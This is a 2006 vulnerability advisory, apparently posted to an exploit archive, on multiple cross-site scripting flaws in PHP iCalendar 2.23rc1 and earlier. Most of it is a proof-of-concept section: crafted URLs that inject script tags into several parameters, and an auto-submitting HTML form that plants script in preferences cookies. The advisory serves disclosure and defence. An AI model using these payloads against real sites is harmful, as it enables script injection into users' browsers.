PHP icalendar versions 2.23rc1 and below are susceptible to multiple cross site scripting vulnerabilities.
697621b4cd8f230c79e1da41eff9540a3b79265fc5704584705ecaf8bfaea5e2
#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisore:http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
#####################################################
PHP icalendar contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
######################
versions
######################
all of this versions have been tested
Posible other versions are prone vulnerables.
PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1
######################
Solution:
######################
No solution was available at this time!!
##################
Time Line
##################
Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006
###################
EXAMPLES & PoC
###################
http://localhost/phpicalendar/day.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/month.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/year.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/week.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/day.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/month.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/year.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/week.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
----
http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15
http://localhost/phpicalendar/search.php?cpath="><script>alert()</script>&cal=Home
%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12
http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102"><script>alert()</script>&query=ss&submit.x=11&submit.y=12
----
http://localhost/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/print.php?cal=Home,US+Holidays,Work
&getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day
################################
Proof of concept for preferences
################################
Multiple param XSS in preferences.php
Use the proof and modify some params
create a evil cookie before submit :)
http://localhost/phpicalendar/preferences.php?cal=Home,US+Holidays,Work
&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E
<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script>
document.forms[0].submit()
</script>
</textarea>
</body>
</html>
######################## nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....